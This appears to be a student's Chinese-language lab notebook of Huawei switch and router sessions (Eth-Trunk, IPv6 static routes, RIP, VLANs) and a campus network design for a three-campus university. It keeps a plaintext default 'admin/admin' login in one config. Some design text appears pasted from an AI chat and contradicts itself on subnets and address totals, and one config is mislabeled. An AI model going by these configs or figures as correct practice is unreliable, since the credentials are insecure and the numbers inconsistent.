[Huawei-GigabitEthernet0/0/1]int g0/0/2
[Huawei-GigabitEthernet0/0/2]eth-trunk 1
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei-GigabitEthernet0/0/2]int g0/0/3
[Huawei-GigabitEthernet0/0/3]eth-trunk 1
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei-GigabitEthernet0/0/3]
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]int Eth-Trunk 1
[Huawei-Eth-Trunk1]int g0/0/1
[Huawei-GigabitEthernet0/0/1]eth-trunk 1
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei-GigabitEthernet0/0/1]int g0/0/2
[Huawei-GigabitEthernet0/0/2]eth-trunk 1
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei-GigabitEthernet0/0/2]int g0/0/3
[Huawei-GigabitEthernet0/0/3]eth-trunk 1
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei-GigabitEthernet0/0/3]
查看状态:
[Huawei-GigabitEthernet0/0/3]dis stp b
MSTID Port Role STP State Protection
0 GigabitEthernet0/0/4 DESI FORWARDING NONE
0 Eth-Trunk1 ROOT FORWARDING NONE
[Huawei-GigabitEthernet0/0/3]
ping通
PC1
PC2
intg0/0/1没有包。
对三个接口抓包,只有最后一个走流量。
配置
[Huawei-GigabitEthernet0/0/3]dis current-configuration
#
sysname Huawei
#
undo info-center enable
#
cluster enable
ntdp enable
ndp enable
#
drop illegal-mac alarm
#
diffserv domain default
#
drop-profile default
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password simple admin
local-user admin service-type http
#
interface Vlanif1
#
interface MEth0/0/1
#
interface Eth-Trunk1
#
interface GigabitEthernet0/0/1
eth-trunk 1
#
interface GigabitEthernet0/0/2
eth-trunk 1
#
interface GigabitEthernet0/0/3
eth-trunk 1
#
interface GigabitEthernet0/0/4
#
...
#
interface GigabitEthernet0/0/23
#
interface GigabitEthernet0/0/24
#
interface NULL0
#
user-interface con 0
user-interface vty 0 4
#
return
[Huawei-GigabitEthernet0/0/3]实验2、ipv6基础实验
基础知识
IPv6地址表示方法可以分为三种:
- 冒分十六进制表示法
格式为 X:X:X:X:X:X:X:X,其中每个X表示地址中的16位,以十六进制表示。例如:
ABCD:EF01:2345:6789:ABCD:EF01:2345:6789在这种表示法中,每个X的前导零是可以省略的,例如:
2001:0DB8:0000:0023:0008:0800:200C:417A → 2001:DB8:0:23:8:800:200C:417A- 0位压缩表示法
如果一个IPv6地址中间包含很长的一段连续零,可以把这一段连续的零压缩为::。但是为了保证地址解析的唯一性,地址中::只能出现一次。例如:
FF01:0:0:0:0:0:0:1101 → FF01::1101
0:0:0:0:0:0:0:1 → ::1
0:0:0:0:0:0:0:0 → ::- 内嵌IPv4地址表示法
为了实现IPv4-IPv6互通,IPv4地址可以嵌入IPv6地址中,此时地址常表示为 X:X:X:X:X:X:d.d.d.d,前96位采用冒分十六进制表示,而最后32位地址则使用IPv4的点分十进制表示。例如:
::192.168.0.1
::FFFF:192.168.0.1注意,在前96位中,压缩0位的方法依旧适用。
一些特殊地址的说明:
注① ::1 表示本地环回地址,类似于IPv4的127.x.x.x
注② :: 相当于IPv4的0.0.0.0
注③ 以FF开头的地址表示组播IPv6地址,例如FF::5类似于IPv4的224.0.0.5
拓扑图
IPv6分配
你说得对,根据图中的拓扑,R1只有两个接口。我修改一下配置:
| 设备 | 接口 | IPv6 地址 | 子网前缀 |
|---|---|---|---|
| PC1 | Eth0/1 | 2001:db8:acad:1::10/64 | 2001:db8:acad:1::/64 |
| R1 | GE0/1 | 2001:db8:acad:1::1/64 | 2001:db8:acad:1::/64 |
| GE0/2 | 2001:db8:acad:2::1/64 | 2001:db8:acad:2::/64 | |
| R2 | GE0/1 | 2001:db8:acad:2::2/64 | 2001:db8:acad:2::/64 |
| GE0/2 | 2001:db8:acad:3::1/64 | 2001:db8:acad:3::/64 | |
| PC2 | Eth0/1 | 2001:db8:acad:3::10/64 | 2001:db8:acad:3::/64 |
配置如下:
- PC1 和 R1 连接在 2001:db8:acad:1::/64 子网
- R1 和 R2 通过 2001:db8:acad:2::/64 子网相连
- PC2 连接到 R2 上,位于 2001:db8:acad:3::/64 子网
路由配置为:
R1:
[Huawei]ipv6 route-static 2001:db8:acad:3:: 64 2001:db8:acad:2::2R2:
[Huawei]ipv6 route-static 2001:db8:acad:1:: 64 2001:db8:acad:2::1配置
PC1:
PC2:
R1
<Huawei>SYS
Enter system view, return user view with Ctrl+Z.
[Huawei]undo inf
[Huawei]undo info-center en
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]ipv6
[Huawei]int g0/0/0
[Huawei-GigabitEthernet0/0/0]ipv6 enable
[Huawei-GigabitEthernet0/0/0]ipv6 add 2001:db8:acad:1::1 64
[Huawei-GigabitEthernet0/0/0]int g0/0/1
[Huawei-GigabitEthernet0/0/1]ipv6 enable
[Huawei-GigabitEthernet0/0/1]ipv6 address 2001:db8:acad:2::1 64R2
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]ipv6
[Huawei]int g0/0/0
[Huawei-GigabitEthernet0/0/0]ipv6 enable
[Huawei-GigabitEthernet0/0/0]ipv6 addr 2001:db8:acad:2::2 64
[Huawei-GigabitEthernet0/0/0]int g0/0/1
[Huawei-GigabitEthernet0/0/1]ipv6 enable
[Huawei-GigabitEthernet0/0/1]ipv6 addr 2001:db8:acad:3::1 64
[Huawei-GigabitEthernet0/0/1]路由配置为:
R1:
[Huawei]ipv6 route-static 2001:db8:acad:3:: 64 2001:db8:acad:2::2缺省
ipv6 route-s :: 0 2001:db8:acad:2::2R2:
[Huawei]ipv6 route-static 2001:db8:acad:1:: 64 2001:db8:acad:2::1缺省
ipv6 route-s :: 0 2001:db8:acad:2::1
测试
成功ping通。
抓包
配置
R1
[Huawei]dis current-configuration
[V200R003C00]
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
ipv6
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ipv6 enable
ipv6 address 2001:DB8:ACAD:1::1/64
#
interface GigabitEthernet0/0/1
ipv6 enable
ipv6 address 2001:DB8:ACAD:2::1/64
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
ipv6 route-static :: 0 2001:DB8:ACAD:2::2
ipv6 route-static 2001:DB8:ACAD:3:: 64 2001:DB8:ACAD:2::2
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
[Huawei]
[Huawei]
R1
[Huawei]dis current-configuration
[V200R003C00]
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
ipv6
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ipv6 enable
ipv6 address 2001:DB8:ACAD:2::2/64
#
interface GigabitEthernet0/0/1
ipv6 enable
ipv6 address 2001:DB8:ACAD:3::1/64
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
ipv6 route-static :: 0 2001:DB8:ACAD:2::1
ipv6 route-static 2001:DB8:ACAD:1:: 64 2001:DB8:ACAD:2::1
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
[Huawei]
3、根据前期实验公司网络提出的客户需求分析,对所提需求完成网络规划和技术设计,完成公司网络系统集成设计(2000台电脑),总公司、分公司地跨两个不同城市。
需求分析-山东科技大学
一、客户需求分析
山东科技大学有青岛校区(主校区)、泰安校区和济南校区,需要构建一个覆盖约2000台电脑的校园网络。主要需求如下:
- 三个校区之间需要建立高速、安全、稳定的网络互联。可选用IPsec VPN或租用运营商专线连接。
- 网络须划分不同网段,如服务器网段、教学区网段、办公区网段、学生宿舍网段等,做到网段之间安全隔离又互通。
- 各校区内部需further细分子网,如教学楼、实验室、机房等,做到网段职责明确、边界清晰、便于管理。
- 网络应具备良好的可扩展性,要便于日后网络升级改造和新建筑接入等。
- 应提供完善的网络安全防护措施,如防火墙、入侵检测、病毒防范等,保障校园网络安全。
- 网络要易于管理维护,需要部署一系列网管软硬件,实现对全网的集中管控、运维、故障排除等。
二、网络拓扑结构设计
根据客户需求,本方案设计了一个三层树状网络拓扑结构。
- 核心层:在青岛主校区机房部署两台高性能三层核心交换机,采用VRRP实现冗余备份,负责连接三个校区和出口。
- 汇聚层:在各校区机房部署两台以太网交换机作为区域汇聚交换机,通过多链路捆绑冗余上联到核心交换机。负责校区各楼宇的汇聚。
- 接入层:每个楼宇部署两台以太网交换机作为接入交换机,双上联到汇聚层,通过MSTP实现链路备份。负责接入各楼层终端。
- 服务器通过双网卡以级联方式接入核心交换机,实现负载均衡和高可用。
- 网管平台、安全设备部署在核心机房,直接接入核心层。
- 校区之间通过IPsec VPN或租用专线连接,通过核心交换机互联。
三、IP地址规划
本设计参考提供的信息,对山东科技大学校园网络进行了统一的IP地址规划。
- 172.16.0.0/22划分给青岛主校区使用。
- 172.16.0.0/24网段用于服务器。
- 172.16.1.0/24网段用于网络管理。
- 172.16.2.0/24和172.16.3.0/24网段用于办公和教学。
- 172.30.0.0/16划分给泰安校区使用。
- 172.30.0.0/24网段用于网络设备互联。
- 172.30.132.0/24网段分配给1C401~1C403机房。
- 172.30.128.0/24网段分配给1B区机房。
- 其他172.30.0.0/16内的子网可供教学楼、办公楼、实验室等使用。
- 172.29.0.0/16划分给济南校区使用,子网划分方式类似泰安校区。
- 10.0.0.0/24、192.168.0.0/24作为设备管理网段,不对外。
四、设备选型配置
- 核心交换机:选用华为 CE12800系列高端路由交换机,配置大容量电源、主控引擎、线卡、电口等,配双机热备。
- 汇聚交换机:选用华为S5720-56C-HI-48S系列交换机,配置48个万兆SFP+,4个40G QSFP+上行口。
- 接入交换机:选用华为S5720-28X-SI-24S-AC系列,配24个千兆SFP,4个万兆SFP+上行口。
- 服务器、存储:采用华为FusionServer、OceanStor系列,具体配置略。
- VPN网关:使用华为USG6680 firewall作为IPsec VPN网关。
- 上网行为管理设备:使用上海恒扬的iNBox ACG-5000E集中管理型上网行为管理设备。
- 网管工作站:选用曙光天阔I620-G30工作站,Windows Server系统,部署网管软件。
五、网络安全设计
本方案提供了较为完善的网络安全防护措施:
- 部署USG6680下一代防火墙,提供IPS、IDS、AV、URL filtering等安全功能。
- iNBox ACG-5000E可对全网HTTP、HTTPS、SSH等流量进行识别过滤和行为管控。
- 网络设备统一修改缺省设置,配置强密码AAA认证,只允许特定管理IP登录管理。
- 开启DHCP snooping、DAI、IP source guard等三层设备安全特性。
- 部署LanScope Net端点准入系统,对接入终端进行安全检查与准入控制。
- 制定安全管理制度,落实责任人制度,定期开展网络安全评估。
六、网络管理设计
为便于对全网进行统一管控,本方案提供了全面的网管系统:
- 使用华为eSight网管平台,对网络设备、服务器存储等进行集中配置、监控、维护。
- 使用卓讯统一运维管理系统,结合工单、CMDB、监控等各功能模块,实现网络自动化运维。
- 使用Splunk进行集中日志管理,对核心网络设备、安全设备的日志进行统一采集、分析。
- 使用华为iMaster NCE智能分析平台,利用大数据、AI等技术,实现网络智能分析、故障诊断。
- 使用NETCONF、YANG等网管协议和数据建模语言,实现网络的可编程自动化。
- 建设集中的网管中心,配备专业网管人员7*24值守,负责日常巡检、变更管理、故障处理等。
接下来还需进一步讨论细化方案,包括方案的可行性论证、投资预算、建设进度等。在后续的实施过程中,还需要与学校各部门密切配合,做好勘察、施工、培训、验收等各环节的工作。期待与贵校携手将这一方案落地实施,助力学校的数字化转型和高质量发展。
VLAN划分信息
进一步细化和完善山东科技大学校园网络的设计方案,特别是在VLAN划分、IP地址规划、网络拓扑等方面提供更详尽的设计。以下是修订后的详细方案:
一、VLAN规划与IP地址分配
为实现网络安全隔离和管理灵活,本方案采用VLAN对校园网络进行广泛划分,每个VLAN对应一个IP子网。
- 青岛校区VLAN规划
| VLAN ID | IP网段 | 掩码 | 说明 | 网关 |
|---|---|---|---|---|
| VLAN 10 | 172.16.0.0 | 255.255.255.0 | 服务器网段 | 172.16.0.254 |
| VLAN 20 | 172.16.1.0 | 255.255.255.0 | 网管网段 | 172.16.1.254 |
| VLAN 30 | 172.16.2.0 | 255.255.255.0 | 办公网段1 | 172.16.2.254 |
| VLAN 40 | 172.16.3.0 | 255.255.255.0 | 办公网段2 | 172.16.3.254 |
| VLAN 50 | 172.16.4.0 | 255.255.255.0 | 教学网段1 | 172.16.4.254 |
| VLAN 60 | 172.16.5.0 | 255.255.255.0 | 教学网段2 | 172.16.5.254 |
| VLAN 70 | 172.16.6.0 | 255.255.255.0 | 学生宿舍网段1 | 172.16.6.254 |
| VLAN 80 | 172.16.7.0 | 255.255.255.0 | 学生宿舍网段2 | 172.16.7.254 |
| VLAN 90 | 172.16.8.0 | 255.255.255.0 | 访客网段 | 172.16.8.254 |
| VLAN 100 | 172.16.9.0 | 255.255.255.0 | 打印机网段 | 172.16.9.254 |
| VLAN 110 | 172.16.10.0 | 255.255.255.0 | IP电话网段 | 172.16.10.254 |
| VLAN 120 | 172.16.11.0 | 255.255.255.0 | 监控网段 | 172.16.11.254 |
| VLAN 130 | 172.16.12.0 | 255.255.255.0 | 无线AP管理网段 | 172.16.12.254 |
| VLAN 1000 | 10.0.0.0 | 255.255.255.0 | 设备互联 | - |
青岛校区共划分了13个用户VLAN,1个核心VLAN,可满足各业务系统分离的需求。各VLAN采用的IP网段均为172.16.0.0/16的子网,掩码为255.255.255.0。其中VLAN 1000不配IP地址,专用于三层设备间互联。
服务器区包括教务系统、OA系统、图书馆、VOD点播、IPTV系统、DNS、DHCP、电子邮件等各类核心业务服务器,统一划入VLAN 10,分配在172.16.0.0/24网段内。
网络管理平台包括网管服务器、日志服务器、计费服务器划入VLAN 20,分配在172.16.1.0/24网段内。
不同教学楼办公区根据地理位置就近划入VLAN 30或40,分别分配172.16.2.0/24和172.16.3.0/24网段。后续可灵活调整办公VLAN数量。
不同教学楼实验室区根据教学要求划入VLAN 50或60,分别分配172.16.4.0/24和172.16.5.0/24网段。教学区与办公区做到VLAN隔离。
不同学生宿舍楼划入VLAN 70或80,分别分配172.16.6.0/24和172.16.7.0/24网段。可灵活调整宿舍VLAN数量。
其他配套网络如访客、打印、语音、视频监控、无线网络管理等,均划分单独的VLAN,互不干扰。
每个VLAN配置3层SVI,在核心交换机上终结VLAN并提供三层网关,负责本VLAN与其他VLAN通信。
- 泰安校区VLAN规划
| VLAN ID | IP网段 | 掩码 | 说明 | 网关 |
|---|---|---|---|---|
| VLAN 10 | 172.30.0.0 | 255.255.255.0 | 设备管理网段 | - |
| VLAN 20 | 172.30.128.0 | 255.255.255.0 | 1B机房 | 172.30.128.254 |
| VLAN 30 | 172.30.132.0 | 255.255.255.0 | 1C401机房 | 172.30.132.254 |
| VLAN 40 | 172.30.133.0 | 255.255.255.0 | 1C402机房 | 172.30.133.254 |
| VLAN 50 | 172.30.134.0 | 255.255.255.0 | 1C403机房 | 172.30.134.254 |
| VLAN 60 | 172.30.135.0 | 255.255.255.0 | 信息中心办公室 | 172.30.135.254 |
| VLAN 70 | 172.30.136.0 | 255.255.255.0 | 主楼办公室 | 172.30.136.254 |
| VLAN 80 | 172.30.137.0 | 255.255.255.0 | 图书馆 | 172.30.137.254 |
| VLAN 90 | 172.30.144.0 | 255.255.240.0 | 学生宿舍1-15栋 | 172.30.144.254 |
| VLAN 100 | 172.30.160.0 | 255.255.240.0 | 学生宿舍16-30栋 | 172.30.160.254 |
| VLAN 110 | 172.30.176.0 | 255.255.240.0 | 教学楼1-3 | 172.30.176.254 |
| VLAN 120 | 172.30.208.0 | 255.255.240.0 | 教学楼4-6 | 172.30.208.254 |
| VLAN 130 | 172.30.192.0 | 255.255.240.0 | 教学实验室 | 172.30.192.254 |
泰安校区根据建筑物和业务类型划分VLAN,核心交换机通过三层SVI为各VLAN提供网关。共划分13个VLAN,分配有172.30.0.0/16网段的13个子网。
1B机房接入VLAN 20,1C401-403机房分别接入VLAN 30-50,IP地址连续分配。
办公区划分为三个VLAN,分属信息中心、主楼、图书馆,互不影响。
学生宿舍划分两个VLAN,每个VLAN掩码为255.255.240.0,可用地址4094个,1-15栋和16-30栋宿舍分属两个VLAN。
教学区根据教学楼栋号划分为三个VLAN,1-3栋、4-6栋、实验室各一个VLAN,互不影响。每个VLAN掩码为255.255.240.0,保证充足的IP地址。
VLAN 10专用于网络设备管理,不分配IP地址。
- 济南校区VLAN规划
济南校区VLAN规划与泰安校区类似,主要有教学区、办公区、实验区、学生宿舍区,共划分约15个VLAN。考虑到IP地址使用需求,建议济南校区采用172.29.0.0/16网段,各VLAN掩码均为255.255.240.0,可充分满足4000余个地址的使用需求。下面是关键的VLAN规划:
| VLAN ID | IP网段 | 掩码 | 说明 | 网关 |
|---|---|---|---|---|
| VLAN 10 | 172.29.0.0 | 255.255.255.0 | 设备管理网段 | - |
| VLAN 20 | 172.29.16.0 | 255.255.240.0 | 教学区1 | 172.29.16.254 |
| VLAN 30 | 172.29.32.0 | 255.255.240.0 | 教学区2 | 172.29.32.254 |
| VLAN 40 | 172.29.48.0 | 255.255.240.0 | 实验区 | 172.29.48.254 |
| VLAN 50 | 172.29.64.0 | 255.255.240.0 | 办公区1 | 172.29.64.254 |
| VLAN 60 | 172.29.80.0 | 255.255.240.0 | 办公区2 | 172.29.80.254 |
| VLAN 70 | 172.29.96.0 | 255.255.240.0 | 学生宿舍1-10栋 | 172.29.96.254 |
| VLAN 80 | 172.29.112.0 | 255.255.240.0 | 学生宿舍11-20栋 | 172.29.112.254 |
二、网络拓扑设计
根据VLAN规划,本方案对山东科技大学校园网提出以下网络拓扑设计:
核心层设计:
在青岛主校区数据中心,部署两台华为 CloudEngine 12800高端核心交换机,型号为CE12816。每台核心交换机配置2个主控引擎, 4个48口万兆线卡,4个48口千兆线卡,4个双口100G QSFP28线卡。
两台核心交换机采用VRRP协议实现网关冗余,避免单点故障。上联分别通过2个100G端口以LACP方式汇聚互联,下联分别以LACP方式汇聚连接汇聚层交换机,实现链路冗余和增加带宽。
核心层配置OSPF动态路由协议,与三个校区的汇聚层交换机建立邻居,相互学习路由。
核心交换机采用SVF双机堆叠虚拟化技术,两台物理设备形成一台逻辑设备,统一管理和配置。
汇聚层设计:
在青岛校区数据中心,部署华为S6720-54C汇聚交换机,每台配置48个万兆SFP+光口和6个40G QSFP+光口。
每个汇聚交换机采用2个40G QSFP+光口以LACP方式上联到核心交换机,4个40G QSFP+光口以级联方式互联。
每个汇聚交换机用于连接青岛校区10-20个接入交换机,根据需要横向扩展。
在泰安、济南校区的中心机房,也各部署2台华为S6720-54C作为汇聚交换机,通过IPSec VPN或租用专线以10G或更高带宽双上联到青岛校区核心交换机,实现三地互通。
每个异地汇聚交换机再以万兆LACP方式下联到本校区的各接入交换机。
汇聚层交换机采用堆叠或者VRRP实现冗余备份,避免单点故障。开启OSPF协议,作为区域汇聚节点。
接入层设计:
在青岛校区,根据各建筑物的面积和网点数量,每栋楼宇部署2-4台S5720-28X-SI-24S-AC接入交换机。
每个接入交换机上联口采用2-4个万兆SFP+光口以LACP捆绑上联到汇聚层,下联通过24个千兆RJ45电口接入办公电脑、AP、IP电话、监控等各类终端,可满足千兆接入需求。
在泰安、济南校区,每个教学楼、办公楼、宿舍楼也部署2台S5720-28X-SI-24S-AC作为楼宇接入交换机,根据网点数量配置。
每幢楼的接入交换机采用MSTP生成树协议防止环路,通过双上联方式提供冗余备份。
接入交换机开启IGMP Snooping和MLD Snooping,结合组播和VLAN,实现组播复制和隔离,提升组播效率。
无线网络设计:
结合有线网络规划,在青岛校区和泰安校区教学楼、办公楼、图书馆等重点区域,规划部署华为AP6050DN无线AP,平均每8-12个房间一个AP。
在学生宿舍和公共活动场所,部署吸顶式AP2050DN-S,平均每3-4个房间一个AP。
无线AP统一采用POE供电,接入二层接入交换机的POE口。无线AP管理VLAN划分为VLAN130。
具体分析
山东科技大学的网络如下:
分青岛校区(主校区)、泰安校区、济南校区。
192.168.0.0/24 作为服务器网段
172.16-31 作为客户端网段。
10.0.0. 作为交换机网段
在泰安有这样的划分:172.30.132.0/24 分配个1C401 1C402 1C403的机房。 172.30.128.0/24分配给 1B区的机房。
从泰安ping到192.168.111.7 (http反代服务器的traceroute如下
路由追踪:
root@ovovoov:~# traceroute 192.168.111.7
traceroute to 192.168.111.7 (192.168.111.7), 30 hops max, 60 byte packets
1 10.31.0.1 (10.31.0.1) 0.305 ms 0.278 ms 0.263 ms (本地路由器)
2 172.29.110.254 (172.29.110.254) 11.057 ms 11.105 ms 10.980 ms
3 172.29.231.2 (172.29.231.2) 6.611 ms 6.573 ms 6.556 ms
4 172.16.0.6 (172.16.0.6) 0.622 ms 0.769 ms 0.541 ms
5 * * *
6 * * *
7 172.16.0.113 (172.16.0.113) 12.178 ms 12.318 ms 12.547 ms
8 192.168.111.7 (192.168.111.7) 10.567 ms 10.584 ms 10.620 ms实际延迟:
root@ovovoov:~# ping 192.168.111.7
PING 192.168.111.7 (192.168.111.7) 56(84) bytes of data.
64 bytes from 192.168.111.7: icmp_seq=1 ttl=57 time=10.7 ms
64 bytes from 192.168.111.7: icmp_seq=2 ttl=57 time=10.5 ms
64 bytes from 192.168.111.7: icmp_seq=3 ttl=57 time=10.5 ms青岛和泰安之间可能通过以下两个方法进行链接:
- IPsec隧道
- 光纤直连。
实际测试路由:(访问山科镜像站,通过内网DNS192.168.100.8解析地址),该服务器为反代服务器。
教育网出口路由追踪:
对于2000台主机,划分VLAN即可,分配172.16-31网段即可进行划分与分配。
对于172.16/12可以分配的空间为:
- 网络地址:
172.16.0.0/12 - IP 范围:
172.16.0.0-172.31.255.255 - 可用 IP 范围:
172.16.0.1-172.31.255.254 - 总地址数: $2^{20} = 1,048,576$
地址空间完全够用,并且可以用/24进行多次划分,区分房间。
一个可行的案例,实际上的划分需要根据客户实际需求来进行划分
| VLAN ID | 网段 | 掩码 | 主机数 | 说明 |
|---|---|---|---|---|
| VLAN10 | 172.16.0.0/21 | 255.255.248.0 | 2046 | 教学区1 |
| VLAN20 | 172.16.8.0/21 | 255.255.248.0 | 2046 | 教学区2 |
| VLAN30 | 172.16.16.0/21 | 255.255.248.0 | 2046 | 办公区1 |
| VLAN40 | 172.16.24.0/21 | 255.255.248.0 | 2046 | 办公区2 |
| VLAN50 | 172.16.32.0/21 | 255.255.248.0 | 2046 | 实验区 |
| VLAN60 | 172.16.40.0/22 | 255.255.252.0 | 1022 | 机房区 |
| VLAN70 | 172.16.44.0/22 | 255.255.252.0 | 1022 | 学生宿舍区1 |
| VLAN80 | 172.16.48.0/22 | 255.255.252.0 | 1022 | 学生宿舍区2 |
| VLAN90 | 172.16.52.0/22 | 255.255.252.0 | 1022 | 学生宿舍区3 |
| VLAN100 | 172.16.56.0/24 | 255.255.255.0 | 254 | 服务器区 |
| VLAN110 | 172.16.57.0/24 | 255.255.255.0 | 254 | 网管区 |
| VLAN120 | 172.16.58.0/24 | 255.255.255.0 | 254 | 门户服务器区 |
| VLAN130 | 172.16.59.0/24 | 255.255.255.0 | 254 | 无线控制器管理区 |
备注:
- 教学区、办公区主机数量较多,每个VLAN分配了/21的子网,可用IP 2046个,预留足够的增长空间。
- 学生宿舍区主机数略少于办公教学区,分配/22子网,可用IP 1022个,满足需求。
- 机房、服务器、网管等区域设备相对固定,分配/24子网,可用IP 254个,满足使用。
- 整个校园网可用IP地址数量合计约14336个,相比之前方案大幅缩减,但依然能满足2000台主机的规模需求,并预留30%的增长空间。
简单拓扑图如下:
该拓扑忽略了,一些公网出口核心交换机,GIWIFI路由等,同时教育网出口在图中没有表达出来。
进行配置:
路由器配置
AR5
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo inf
[Huawei]undo info-center en
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]int g0/0/1
[Huawei-GigabitEthernet0/0/1]ip addr 10.1.1.1 24
[Huawei-GigabitEthernet0/0/1]int g0/0/1
[Huawei-GigabitEthernet0/0/1]ip addr 10.30.30.1 24
[Huawei-GigabitEthernet0/0/1]ip addr 10.1.1.1 24
[Huawei-GigabitEthernet0/0/1]int g0/0/2
[Huawei-GigabitEthernet0/0/2]int g0/0/0
[Huawei-GigabitEthernet0/0/0]ip addr 10.30.30.1 24
[Huawei-GigabitEthernet0/0/0]rip
[Huawei-rip-1]version 2
[Huawei-rip-1]network 10.0.0.0
[Huawei-rip-1]AR2:
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]int g0/0/0
[Huawei-GigabitEthernet0/0/0]ip addr 10.1.1.2 24
[Huawei-GigabitEthernet0/0/0]int g0/0/1
[Huawei-GigabitEthernet0/0/1]ip addr 10.2.2.2 24
[Huawei-GigabitEthernet0/0/1]int g0/0/2
[Huawei-GigabitEthernet0/0/2]ip addr 10.20.20.1 24
[Huawei-GigabitEthernet0/0/2]rip 1
[Huawei-rip-1]vers
[Huawei-rip-1]version 2
[Huawei-rip-1]netwo
[Huawei-rip-1]network 10.0.0.0
[Huawei-rip-1]AR3
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]int g0/0/0
[Huawei-GigabitEthernet0/0/0]ip addr 10.2.2.3 24
[Huawei-GigabitEthernet0/0/0]
Jun 18 2024 18:27:37-08:00 Huawei %%01IFNET/4/LINK_STATE(l)[0]:The line protocol
IP on the interface GigabitEthernet0/0/0 has entered the UP state.
[Huawei-GigabitEthernet0/0/0]undo in
[Huawei-GigabitEthernet0/0/0]undo inf
[Huawei-GigabitEthernet0/0/0]q
[Huawei]undo inf
[Huawei]undo info-center en
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]int g0/0/1
[Huawei-GigabitEthernet0/0/1]ip addr 10.10.10.1 24
[Huawei-GigabitEthernet0/0/1]rip 1
[Huawei-rip-1]vers
[Huawei-rip-1]version 2
[Huawei-rip-1]netw
[Huawei-rip-1]network 10.0.0.0
[Huawei-rip-1]泰安:核心交换机VLAN相互连通
核心交换机
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo inf
[Huawei]undo info-center en
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]vlan b 130 128 132 300 160 2110
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]int vlanif 130
[Huawei-Vlanif130]ip addr 172.30.130.1
^
Error:Incomplete command found at '^' position.
[Huawei-Vlanif130]ip addr 172.30.130.1 24
[Huawei-Vlanif130]int vlanif 128
[Huawei-Vlanif128]ip addr 172.30.128.1
^
Error:Incomplete command found at '^' position.
[Huawei-Vlanif128]ip addr 172.30.128.1 24
[Huawei-Vlanif128]int vlanif 132
[Huawei-Vlanif132]ip addr 172.30.132.1 24
[Huawei-Vlanif132]int vlanif 300
[Huawei-Vlanif300]ip addr 172.20.20.1 24
[Huawei-Vlanif300]int g0/0/1
[Huawei-GigabitEthernet0/0/1]p l t
[Huawei-GigabitEthernet0/0/1]p l a v a
^
Error:Ambiguous command found at '^' position.
[Huawei-GigabitEthernet0/0/1]p t a v a
[Huawei-GigabitEthernet0/0/1]
LSW4
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo inf
[Huawei]undo info-center en
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]vlan b 130 128 132 300 160 2110
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]int e0/0/3
[Huawei-Ethernet0/0/3]p l a
[Huawei-Ethernet0/0/3]p d v 132
[Huawei-Ethernet0/0/3]int e0/0/4
[Huawei-Ethernet0/0/4]p l a
[Huawei-Ethernet0/0/4]p d v 128
[Huawei-Ethernet0/0/4]int e0/0/5
[Huawei-Ethernet0/0/5]p l a
[Huawei-Ethernet0/0/5]p d v 128
[Huawei-Ethernet0/0/5]int e 0/0/2
[Huawei-Ethernet0/0/2]p l t
[Huawei-Ethernet0/0/2]p t a v a
[Huawei-Ethernet0/0/2]int e0/0/1
[Huawei-Ethernet0/0/1]p l t
[Huawei-Ethernet0/0/1]p t a v a
LSW5
[Huawei]undo in e
Info: Information center is disabled.
[Huawei]int e0/0/1
[Huawei-Ethernet0/0/1]p l t
[Huawei-Ethernet0/0/1]p t a v a
[Huawei-Ethernet0/0/1]vlan b 130 128 132 300 160 2110
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]int e0/0/2
[Huawei-Ethernet0/0/2]p l a
[Huawei-Ethernet0/0/2]p d v 130
[Huawei-Ethernet0/0/2]
测试VLAN可以正常通信
济南:核心交换机配置
核心交换机配置:
[Huawei]undo in en
Info: Information center is disabled.
[Huawei]vlan b 130 128 132 300 160 2110
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]vlan b 130 128 132 300 160 2110 2111
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]int vlanif 2110
[Huawei-Vlanif2110]ip addr 172.21.10.1 24
[Huawei-Vlanif2110]int vlanif 2111
[Huawei-Vlanif2111]ip addr 172.21.11.1 24
